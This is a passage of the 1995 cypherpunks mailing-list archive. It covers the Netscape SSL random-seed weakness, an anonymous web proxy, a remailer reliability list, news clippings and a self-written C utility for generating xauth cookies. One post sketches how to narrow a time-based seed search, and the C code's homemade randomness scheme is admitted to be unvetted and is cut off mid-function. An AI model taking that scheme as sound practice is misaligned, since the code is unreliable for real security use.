
>You can encrypt a message, and then fax or email it (via plain 
>old standard fax machine or fax modem), print it to paper or save 
>to a disk file.

>It is fully licensed, without restriction for export, by the U.S. 
>Department of Commerce. NO PGP WORRIES.

Also no worries about security - if DOC says you can have it, you can bet
that NSA has seen to it that it is cryptographically weak, or else uses a
key escrow system (where somebody else can get to the keys), and as insecure
as any other non-published method.  For all we know, they may be using a
cereal box decoder ring set up.

>Email me for a free copy which will be sent to you via email or 
>snail mail post. It is fully functional (not crippleware) and 
>enables you to try our system out before purchase with 8 free 
>page scrambles. It retails for $130 per installed computer. 
>Looking for end users and distributors.

>Thanks,
>David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jis@mit.edu (Jeffrey I. Schiller)
Date: Sun, 17 Sep 95 23:34:08 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape SSL implementation cracked!
Message-ID: <ac82c28b000210042af3@[18.162.1.1]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Makes one wonder what the seed is on a Windows implementation...
>If it's only the time, you can probably approximate what the
>clock is set to within a couple of minutes (if the timezone of the
>client is known).

Who cares what the timezone of the client is. Try searching around in all
24 timezones. The trick with predicting a random number generator isn't
that you have to get the exact key, you just have to narrow the search
space to something reasonable. A couple of minutes times 24 isn't that bad!

                                -Jeff

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMF0SvMUtR20Nv5BtAQEAVQP/ccPp8IM8dnGtdDTajjO1a0sYBo7u7LcB
yracUhWnE6h90DEtEbGHpEUz3UpvMrXVTC1cFYXml8v3zH4DKlgXyIwC1kItAbqB
9NJTtvB1D5Msnoslqkn+ZoP2K8i0ajcHcXlqma32YiQJM6D4KSxFtRgM7vawCVuy
KqnbrdSrQQQ=
=bYf5
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Sun, 17 Sep 95 18:57:46 PDT
To: cypherpunks@toad.com
Subject: Anonymous WWW proxy Alpha release available
Message-ID: <9509180157.AA13253@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

If you are interested, the first (alpha) version of my anonymous httpd
proxy is available  see http://hplyot.obspm.fr:6661/ (where it runs,
unless it dies meanwhile, then see
http://hplyot.obspm.fr/~dl/wwwtools.html  or mail me)

Ok, what does it do more than cern's :

  + It's single process, light, and mostly multi-tasking
  + It removes all nasty 'personal' infos like user-agent, referer,...
  + If there is a "ProxyControl: V1 <proxy-list>" in the header,
    it will first send the request to the first proxy listed
    in the list and sending to that one a "ProxyControl: V1
    <rest-of-proxy-list>" header
  + If you launch your personal copy of the AnonProxyHttp with
    arguments  "port 2 ph1:pp1 ph2:pp2 ph3:pp3" and 
    setenv http_proxy http://localhost:port/
    accessing the web now goes through your AnonProxy, which randomly
    creates a route to your url going through 2 of the 3 specified
    other AnonProxy

What will come when I'll have some time :
  
  + more flexibility in the spec of the other AnonProxies and
    a centralized and/or distributed catalog of available proxies

What I need folks for :

  + get it and run it (and debug?), so we could chain them :-)

What is the big catch/problem :

  + it's written in .... Tcl + tcl-dp + tclX !
    (plz don't flame me...)
    so you need a tcl-dp+tclX interp to try it locally...

Feedback  / Comments / ... welcome
Regards
dl

- -- 
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAgUBMFzRIXk52/beodHxAQFGzAP+Kl4ImRpuYIjSk7rtEjGIoPVSv1d1j6sq
9GIgmFgRLSyiw2LcYzlFNxtEOqAjM2k+rJttHxavKOJb+eeAzqZP7ihWHfBv8FS3
56SiCw16h2OPsEeZ4TOkUmMTEGDWHJKN9tfVac4qpuG1LZ7A2RejMAUV9qp02LNg
Vch5aDWlPNc=
=AvS/
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Mon, 18 Sep 95 02:29:53 PDT
To: cypherpunks@toad.com
Subject: Jill Sixpack wants to know?
Message-ID: <199509180929.CAA12683@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Is the cracking of Netscape SSL the equivalent of lockpicking,
as opposed to the keycracking stuff we did (making a key).

And further, we can do it rather fast, like in minutes?

I just want to make sure I explain it to Jill Sixpack correctly. OK!
KEWLNESS!

Love Always,

Carol Anne
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 18 Sep 95 06:50:41 PDT
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199509181350.GAA01202@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33.tar.gz

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp hash cut reord mix post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash mix cut ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"crown"} = "<mixmaster@kether.alias.net> cpunk pgp hash latent cut mix ek reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@spook.alias.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"gondolin"} = "<mixmaster@gondolin.org> cpunk mix hash latent cut ek ksub reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
$remailer{"ncognito"} = "<ncognito@gate.net> cpunk";
$remailer{"precip"} = "<mixmaster@mix.precipice.com> cpunk mix pgp hash latent cut ek reord";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

News: the remailer list has been rewritten, and the new version is
live! It should be more accurate, reliable, and faster than before.

Penet is back up! Enjoy.

remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
ford     remailer@bi-node.zerberus.de     -**-**++*--*  1:29:00 100.00%
crown    mixmaster@kether.alias.net       -----++--+++    51:47  99.99%
syrinx   syrinx@c2.org                    +++-+++-++++    41:46  99.99%
hroller  hroller@c2.org                   ******+#####     1:06  99.99%
precip   mixmaster@mix.precipice.com         +-++-+.--  6:12:30  99.98%
bsu-cs   nowhere@bsu-cs.bsu.edu           ++*+--_**#+#    16:52  99.98%
robo     robo@c2.org                      ******+##*##     1:07  99.97%
spook    remailer@spook.alias.net         -----------   2:16:14  99.95%
alumni   hal@alumni.caltech.edu           *** **+*+###     3:07  99.93%
portal   hfinney@shell.portal.com         +* *** #+###     3:08  99.81%
hacktic  remailer@utopia.hacktic.nl       ****** ++***    10:42  99.68%
rmadillo remailer@armadillo.com           ++++++++++ +    39:26  99.57%
replay   remailer@replay.com              *****  ++***     7:28  99.55%
flame    remailer@flame.alias.net          +*+++ ++***    27:46  99.42%
vishnu   mixmaster@vishnu.alias.net       --+*-  +++-+  1:36:19  99.29%
mix      mixmaster@remail.obscura.com     ___.+--._. - 12:46:51  98.98%
ideath   remailer@ideath.goldenbear.com   -----.----+   5:04:07  98.43%
extropia remail@extropia.wimsey.com       -.---.-----   5:56:37  97.65%
c2       remail@c2.org                    ++++** *+ *     27:40  96.11%
penet                                             * ++  4:40:10  95.85%
rahul    homer@rahul.net                  ******+*#+##     2:18  99.99%
ncognito ncognito@gate.net                **+*+*-++        6:59  68.25%
gondolin mixmaster@gondolin.org           ---.--*--     3:11:17  67.07%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@robo.remailer
Date: Mon, 18 Sep 95 07:30:57 PDT
To: cypherpunks@toad.com
Subject: Code of Law
Message-ID: <199509181425.HAA13003@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Financial Times, Sept 18, 1995.

Code to deny the money launderer

The International Bar Association will this week call for
the establishment of a code of practice for lawyers
worldwide to deny criminals access to legal services
which facilitate money laundering.

At the IBA's business law conference in Paris, which
opens today, Professor Ross Harper, IBA president, will
ask representatives from 167 bar associations to pass a
motion supporting efforts to counter money laundering and
for the creation of common professional standards on the
issue.

"We are anxious that there be no safe havens for the
ill-gotten proceeds of criminal activities throughout the
world," he said yesterday. Estimates put the amount of
money laundered worldwide each year at more than 500
billion pounds. On such a scale it is possible for
economies, world trade and global banking to be subverted
by organised crime, the IBA says.

The motion urges member bar associations to press their
national governments to adopt the principal
recommendations of the Financial Action Task Force on
money laundering set up in 1989 by the Group of Seven
industrialised countries and the European Commission. 

Robert Rice, London

-----

Newsweek, Sept 25, 1995.

A Law of Their Own: Extremists create do-it-yourself
courts.

One day last month Wichita District Attorney Nola
Foulston looked at her copy of the Daily Record, a trade
newspaper, and was stunned to read that she had been
subpoenaed. She was ordered to appear in District Court
and produce her license to practice law. If she failed to
appear, the sheriff would be directed to arrest her. Her
alleged crime: holding public office. The subpoena was an
unofficial document drafted and filed by a local man who
had been charged with a misdemeanor for burning trash
without a permit. Angered by the government interference,
he joined a growing number of disgruntled Americans who
think they've found a better arbiter of justice. He went
to a "Common Law court," one of the latest incarnations
of the extremist right. Foulston ignored the subpoena. "I
don't practice in false courts," she says.

But they're growing. Common Law courts have sprung up in
at least 11 states in the farm belt and the West over the
last year, organized by a cross section of people bent on
directly challenging government. In living rooms, bingo
halls and convention centers, dozens gather weekly to
form juries, present evidence and issue kangaroo-court
indictments, liens, arrest warrants -- and even death
sentences. None of this has the force of law.

The movement is based on a mixture of crackpot conspiracy
theories and bizarre interpretations of the U.S.
Constitution, the Bible and the Magna Charta. In brief,
its leaders preach that Franklin Delano Roosevelt's "bank
holiday" edict of 1933, which temporarily shut down the
nation's banks, stripped the country of its safeguards
against tyranny. "When you get to digging into what's
going on today, you have a government operating outside
the Constitution," says David Schechter, a court
organizer.

Court members keep in touch on the Internet, swapping
information, posting meetings and organizing court
sessions. They also vent their views in a Texas magazine
called the AntiShyster. Mostly white men form Common Law
courts; many come from the militia movement. Some are
closely aligned with white-supremacy and anti-Jewish
groups. "The basic idea behind the movement," says
University of Oregon history professor Richard Brown, "is
'popular sovereignty,' that people are above the law.
These people are alienated from the legal system. To some
extent it sounds like they're also trying to settle
personal scores."

Nuisance filings: At times, the movement spills out of
its bogus courts and into real ones. Followers have tied
up courts and IRS offices with thousands of pages of
nuisance filings. Common Law court "marshals" have even
burst into federal courtrooms wearing official-looking
badges and uniforms to serve their papers. Last year in
Garfield County, Mont., 36 men and women formed a Common
Law court and briefly occupied a courthouse. Another
court offered $1 million bounties for the arrest of local
officials and threatened to hang them. Garfield County
Attorney Nick Murnion charged some members of the Common
Law court with "criminal syndicalism," alleging that the
group had advocated acts of violence for political
purposes. One court member was sentenced to 10 years in
prison. Others received smaller sentences.

Some members try to use the rump courts to reverse real
ones. Favorite targets are divorce decrees and
foreclosure notices. "People who don't want to or can't
pay their bills are turning to something that tells them
they don't have to," says Kansas City attorney Berry F.
Laws III, who has been targeted by Common Law courts
because he forecloses on farm mortgages for the Farmers
Home Administration.

This is a serious business, but it has elements of
unintended burlesque. William Ellwood of Columbus, Ohio,
joined up after his small business collapsed and he found
that he still owed the Internal Revenue Service $5,100.
Frustrated and annoyed, he took to researching the
Constitution and concluded that he was living in a land
that infringed on his personal liberty. One thing led to
another until he found himself ticketed by a police
officer for weaving on a highway. His reading of the
Constitution made the ticket null and void. "What we're
saying," he patiently explains, "is the motor-vehicle
laws are laws of commerce. I don't use the laws for
private gain, so why do I have to be stopped?" Ellwood
eventually paid the ticket, but not before he and a small
group of like-minded citizens reached out to organizer
Schechter. Now they meet every Tuesday to have their day
in a court of their own making.

Thomas Heath in Denver and Connie Leslie

-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@it.kth.se>
Date: Sun, 17 Sep 95 22:26:37 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape SSL implementation is broken!
Message-ID: <199509180525.HAA06519@piraya.electrum.kth.se>
MIME-Version: 1.0
Content-Type: text/plain



Hi!

Neat, I'd say. Has everyone sold their Netscape Comm stock yet? :-)

I guess we should send them the draft-ietf-security-randomness-00.txt
asap.

I was also thinking about how many Credit Card numbers will pass
between now and the moment Netscape has done anything about it.
This piece of information does have quite a value, I'd say.

I have included a short program that tries to generate non-guessable
random numbers. It was written a bit back, and my coding style isn't
all that good. It might be interesting, or not.  (Btw, if you find any
problems with it, I'd appreciate to know about it.)

/Christian


----- ZZ: README -----
asadi -
   "As strong as DES is" (hopefully)

Written by: Christian Wettergren
            cwe@nada.kth.se
            February 1993

Introduction
------------

This utility generates a "random" hexstring, which can be used as input
to xauth, for example. It uses a private secret and some other input
to generate the hexstring. In this way a long-term secret can be used
to generate a short-term secret. Since the short-term secret might be
compromised (different xauth cookies might be tried repeatedly, since
no warning is emitted from the Xserver) it is not safe to use the
same secret on repeated occasions.

This utility does not even need a private long-term secret, since it
may use the ticket generated within the Kerberos authentication system.
In this way the long-term secret is as guarded as your private password
or the Kerberos master-password.

If you don't use the Kerberos system, you have to regenerate the long-term
secret sometimes (in the same way as you change your password). This
utility tries to help you with that step too. A decent pseudo-random
generator is included, and a routine that helps you generate the secret
might be run.

The short-term secret won't reveal anything about the long-term secret,
since the long-term secret is altered and then encrypted with DES. The
result is the short-term secret. 


Search space
------------

The algorithm used to generate the long-term secret tries to enlarge the
search-space as much as possible, so that an exhaustive attack becomes
difficult.

The factors involved are:

     1/ A good random generator
     2/ time-of-day
     3/ user entered text
     4/ user dependant elapsed time
     5/ pid of process
     6/ hostid of computer
     7/ not using consecutive values from
        random generator (initial throw-away &
        intermediate throw-away.)

The most important of all is of course the random generator. The included 
generator is a minimum standard.







    Probable usage: 
      echo add $DISPLAY MIT-MAGIC-COOKIE-1 `asadi` | xauth 

    DISCLAIMER: No guarantees are made about this
    program, explicit or implicit. It is distributed
    AS IS. etc... :-)

  opensafely() -
  open file, try not to reveal when it was
  written.

  Unfortunately, this is not possible!
  No matter how this is done, at least the
  ctime reveals when it was written.

  If I don't remember incorrectly, there are
  bugs in the filesystem under SunOS, so that
  the ctime-field is updated too often. Maybe 
  this might distort this field sometimes.

  Another approach might be to chmod the file
  whenever it is used. In this way it's ctime
  field is updated and hence overwritten.
  It does not reveal anything extra either, 
  since the approximate time when the cookie is
  generated is probably shown in ~/.Xauthority
  anyway.


/* gensecret() -

   generate a good secret "random" file.

   This routine tries to enlarge the search-space
   for a potential cracker. The involved factors
   are:

     1/ A good random generator (see accompanying file.)
     2/ time-of-day
     3/ user entered text
     4/ user dependant elapsed time
     5/ pid of process
     6/ hostid of computer
     7/ not using consecutive values from
        random generator (initial throw-away &
        intermediate throw-away.)

   This approach hopefully deters an attack, or at least
   makes it considerably harder for the attacker.

   Does anyone see any weakness in the above approach? It
   is not based on any cryptological analysis, so no
   guarantees are made of it's appropriateness.
*/

  fprintf(stderr, "asadi - generate a good random hexstring based on\n");
  fprintf(stderr, "        a private secret as a seed. (This secret can\n");
  fprintf(stderr, "        be the Kerberos ticket-file.) Could be used\n");
  fprintf(stderr, "        for getting a good xauth-cookie, for example.\n\n");
  fprintf(stderr, "Usage: asadi [-r] [-l n] [-v] [filename]\n");
  fprintf(stderr, "       -r   -- generate a secret file (default: ~/.secret\n");
  fprintf(stderr, "       -l n -- how many 8-byte blocks to output (default: 16)\n");
  fprintf(stderr, "       -v   -- verbose, not very interesting.\n");
  fprintf(stderr, "       filename -- name of secret file (default: Kerberos\n");
  fprintf(stderr, "                   ticket file, or ~/.secret)\n");


---- ZZ: asadi.c ----

/*****************************************
    asadi v1.1 -
      "As strong as DES is" (hopefully)

    This utility generates a "random" 
    hexstring, which can be used as input
    to xauth, for example. Either a Kerberos
    ticketfile or a secret file is used as
    seed to the random generator. Other input
    is probably hostid, process id and time,
    depending on the implementation of the 
    DES-library.

    The random generator used is the DES-
    algorithm. This method is guaranteed 
    not to reveal anything about the used 
    seed. To crack the cookie you have to 
    crack DES. (There is also a normal good 
    pseudo-random generator included, to
    facilitate the generation of secrets.)


    Written by: Christian Wettergren
                cwe@nada.kth.se
                February 1993

    Usage:
      asadi [keyfilename] [-v] [-l num] [-r]

    The number of 8-byte blocks to 
    generate can be controlled with the 
    -l-switch. There is also a verbose-
    switch.

    If one does not use Kerberos, a secret file
    can be used as a key instead. The contents 
    of this file will not be revealed by this 
    program, but you should of course NOT USE 
    your password anyway!

    To help generate this secret file is a
    decent (according to it's author, not me) random-
    generator included in this program. Use
    the r-switch for this. It deposits the secret
    in the file ~/.secret (with the appropriate
    chmod). This file is also used if there is
    no Kerberos.

    Probable usage: 
      echo add $DISPLAY MIT-MAGIC-COOKIE-1 `asadi` | xauth 

    DISCLAIMER: No guarantees are made about this
    program, explicit or implicit. It is distributed
    AS IS. etc... :-)
*****************************************/


/* Settings of this program */

#define USEKRB /* switches the use of Kerberos on/off */
#define DEFAULTKEYLEN  8 /* multiples of 16 nibbles */
#define SECRETFILE ".secret"


#include <stdio.h>
#include <stdlib.h>   /* exit, atoi, getenv, malloc */
#include <string.h>   /* strlen, strcpy, strcat */
#include <unistd.h>   /* read, write, close, unlink, getpid, gethostid */
#include <errno.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/stat.h>
#include <utime.h>
#include <fcntl.h>
#include <des.h>
#ifdef USEKRB
#include <krb.h>
#endif

/* routines from rand.c, plus getpass() for systems whose headers
   do not declare it */
extern char *getpass();
extern void goodsrand(unsigned long);
extern unsigned long goodrand(void);


/* Globals */
char *keyfile = NULL;
int vflag = 0;
int keylen = DEFAULTKEYLEN;

int major = 1; /* version of program */
int minor = 0;

/* calculate a secret key from the file. */

/* Algorithm: read 8 bytes, add them byte-wise to the
   cblock, continue until eof.

   Hence there is no actual reason to use files
   larger than eight bytes, but the above approach is
   used since the ticket-files are larger. (In this 
   way I don't have to care about file's structure 
   too much, either.)
*/
void calcsecretkey(char *file, des_cblock *key) {

  des_cblock tmp;
  int i;
  int fd;

  if (vflag)
    fprintf(stderr, "file: %s\n", keyfile);

  if ((fd = open(file, O_RDONLY)) == -1) {
    fprintf(stderr, 
	    "Could not open '%s', no cookie generated! (errno=%d)\n", 
	    file, errno);
    exit(1);
  }

  while (read(fd, &tmp, sizeof(des_cblock)) == sizeof(des_cblock)) {
    for(i = 0; i < sizeof(des_cblock); i++)
      *((unsigned char *)key + i)
	= *((unsigned char *)key + i) + *((unsigned char *)tmp + i);
    DES_ZERO_CBLOCK(tmp);  /* fixes eof-condition */
  }

  /* close the file */
  if (close(fd) == -1) {
    fprintf(stderr, "Could not close file! (errno=%d)\n", errno);
    exit(1);
  }
}


void printcblock(FILE *fd, des_cblock *blk) {

  int i;
  for(i=0; i < sizeof(des_cblock); i++) {
    fprintf(fd, "%02x", 
	   (unsigned int)(*((unsigned char *)blk + i) & 255));
  }
}

/* 
  opensafely() -
  open file, try not to reveal when it was
  written.

  Unfortunately, this is not possible!
  No matter how this is done, at least the
  ctime reveals when it was written.

  If I don't remember incorrectly, there are
  bugs in the filesystem under SunOS, so that
  the ctime-field is updated too often. Maybe 
  this might distort this field sometimes.

  Another approach might be to chmod the file
  whenever it is used. In this way it's ctime
  field is updated and hence overwritten.
  It does not reveal anything extra either, 
  since the approximate time when the cookie is
  generated is probably shown in ~/.Xauthority
  anyway.
*/
int opensafely(char *file) {

  int fd;

  /* delete old file, if any */
  if (unlink(file) == -1) {
    if (errno != ENOENT) {
      fprintf(stderr, "Error: could not unlink '%s'. (errno=%d)\n", 
	      file, errno);
      exit(1);
    }
  }

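  /* open it again; O_EXCL makes the open fail if the path has been
     re-created (for example as a symlink) since the unlink above */
  if ((fd = open(file, O_WRONLY|O_CREAT|O_EXCL, S_IRUSR)) == -1) {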
    fprintf(stderr, "Error: could not create '%s'. (errno=%d)\n", 
	    file, errno);
    exit(1);
  }
  return(fd);
}

/* gensecret() -
   generate a good secret "random" file.

   This routine tries to enlarge the search-space
   for a potential cracker. The involved factors
   are:

     1/ A good random generator (see accompanying file.)
     2/ time-of-day
     3/ user entered text
     4/ user dependant elapsed time
     5/ pid of process
     6/ hostid of computer
     7/ not using consecutive values from
        random generator (initial throw-away &
        intermediate throw-away.)

   This approach hopefully deters an attack, or at least
   makes it considerably harder for the attacker.

   Does anyone see any weakness in the above approach? It
   is not based on any cryptological analysis, so no
   guarantees are made of it's appropriateness.
*/
void gensecret(char *file) {

  int i,j;
  struct timeval t, s;
  unsigned long d, u = 0, v;  /* u accumulates the XOR of the typed text */
  int fd;
  unsigned long x;
  char *c;
  char n[100];
  int ta, b;
  struct utimbuf tm;

  /* Get time before enter */
  gettimeofday(&s, (struct timezone *)0);
  
  /* heading */
  printf("\nGenerating a Secret!\n");

  /* get user's response */
  printf("\nCAUTION! Don't use your password below!\n");
  printf("You don't have to remember this data, so\n");
  printf("just type something in.\n\n");
  c = getpass("Enter something:");

  /* get time after enter */
  gettimeofday(&t, (struct timezone *)0);
  d = t.tv_usec - s.tv_usec;

  /* make something of input */
  for(j=0; j < strlen(c) / sizeof(unsigned long); j++) {

    /* collect sizeof(long) bytes of input */
    for(v=0, i=0; i < sizeof(unsigned long); i++) 
      v = (v << 8) + c[i+j*sizeof(unsigned long)];

    /* xor them together */
    u ^= v;
  }

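  /* get throw-away factors (fgets bounds the read to the buffer) */
  printf("\nEnter a throw-away factor: ");
  if (fgets(n, sizeof(n), stdin) == NULL)
    n[0] = '\0';
  ta = atoi(n);
  printf("\nEnter a step factor: ");
  if (fgets(n, sizeof(n), stdin) == NULL)
    n[0] = '\0';
  b = atoi(n);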

  /* verbose */
  if (vflag) {
    fprintf(stderr, "text: %s\n", c);
    fprintf(stderr, "garbled text: %ld\n", u);
    fprintf(stderr, "elapsed: %ld\n", d);
    fprintf(stderr, "time: %ld %ld\n", t.tv_sec, t.tv_usec);
    fprintf(stderr, "pid: %d\n", getpid());
    fprintf(stderr, "hostid: %ld\n", (long)gethostid());
    fprintf(stderr, "throw-away factor: %d\n", ta);
    fprintf(stderr, "step factor: %d\n", b);
    fprintf(stderr, "generated seed: %ld\n", t.tv_usec ^ t.tv_sec ^ d ^ getpid() ^ gethostid() ^ u);
  }

  /* init random generator */
  goodsrand(t.tv_usec ^ t.tv_sec ^ d ^ getpid() ^ gethostid() ^ u);
  
  /* open the file safely */
  fd = opensafely(keyfile);

  /* throw-away ta numbers */
  for(i=0; i < ta; i++)
    (void)goodrand();

  /* 
     this actually writes sizeof(long) 
     times too much data, but it does not
     matter. 
  */
  for (i=0; i<sizeof(des_cblock); i++) {

    x = goodrand();
    if (write(fd, &x, sizeof(unsigned long)) != sizeof(unsigned long)) {
      fprintf(stderr, 
	      "Error: could not write '%s'. (errno=%d)\n", 
	      keyfile, errno);
      exit(1);
    }

    /* throw-away (step) b numbers */
    for(j=0; j < b; j++)
      (void)goodrand();
  }

  /* close the file */
  if (close(fd) == -1) {
    fprintf(stderr, 
	    "Error: could not close '%s'. (errno=%d)\n", 
	    SECRETFILE, errno);
    exit(1);
  }
  
  /* 
     reset times on file.
     (ctime still shows the creation-time though) 
  */
  tm.actime = 0;
  tm.modtime = 0;
  if (utime(keyfile, &tm) == -1) {
    fprintf(stderr, "warning: could not reset times on file '%s'.\n", keyfile);
    fprintf(stderr, "You should /bin/touch it manually at a later time!\n");
  }

  fprintf(stderr, "Secret written to '%s'.\n", keyfile);
}

void hidedate(char *file) {

  /* each chmod updates the ctime of the file */
  if (chmod(file, 0) == -1) {
    fprintf(stderr, "warning: could not chmod '%s'. (errno=%d)\n",
	    file, errno);
  }
  if (chmod(file, S_IRUSR) == -1) {
    fprintf(stderr, "warning: could not chmod '%s'. (errno=%d)\n",
	    file, errno);
  }
}

void usage(void) {

  fprintf(stderr, "asadi v%d.%d\n", major, minor);
  fprintf(stderr, "        generate a good random hexstring based on\n");
  fprintf(stderr, "        a private secret as a seed. (This secret can\n");
  fprintf(stderr, "        be the Kerberos ticket-file.) Could be used\n");
  fprintf(stderr, "        for getting a good xauth-cookie, for example.\n\n");
  fprintf(stderr, "Usage: asadi [-r] [-l n] [-v] [filename]\n");
  fprintf(stderr, "       -r   -- generate a secret file (default: ~/.secret\n");
  fprintf(stderr, "       -l n -- how many 8-byte blocks to output (default: 16)\n");
  fprintf(stderr, "       -v   -- verbose, not very interesting.\n");
  fprintf(stderr, "       filename -- name of secret file (default: Kerberos\n");
  fprintf(stderr, "                   ticket file, or ~/.secret)\n");
}

int main(int argc, char *argv[]) {

  int i;
  int l;
  int rflag = 0;
  int gfn = 0;
  des_cblock key;
  des_cblock out;

  /* Handle options */
  for (i=1; i < argc; i++) {
    
    if (argv[i][0] == '-') {
      switch(argv[i][1]) {

      case 'v':
	vflag++;
	break;

      case 'l':
	if (++i >= argc) {  /* -l needs a value after it */
	  usage();
	  return(1);
	}
	keylen = atoi(argv[i]);
	break;

      case 'r':
	rflag++;
	break;

      case 'h':
	usage();
	return(1);
	break;

      default:
	fprintf(stderr, "error: Unknown option '%s'.\n", argv[i]);
	usage();
	return(1);
      }
    }
    else {
      keyfile = argv[i];
      gfn++;
    }
  }

#ifdef USEKRB
  if (!keyfile && !rflag) {
    keyfile = tkt_string();
    gfn = 0;
  }
#endif
  if (!keyfile) {
    char *h;
    if ((h = getenv("HOME")) == NULL) 
      h = ".";
    keyfile = malloc(sizeof(char) * strlen(h) + 2 + strlen(SECRETFILE));
    strcpy(keyfile, h);
    strcat(keyfile, "/");
    strcat(keyfile, SECRETFILE);
    gfn++;
  }

  /* Which mode are we in? */
  if (rflag) {
    gensecret(keyfile);
    return(1);
  }

  /* hide creation-date */
  if (gfn)
    hidedate(keyfile);

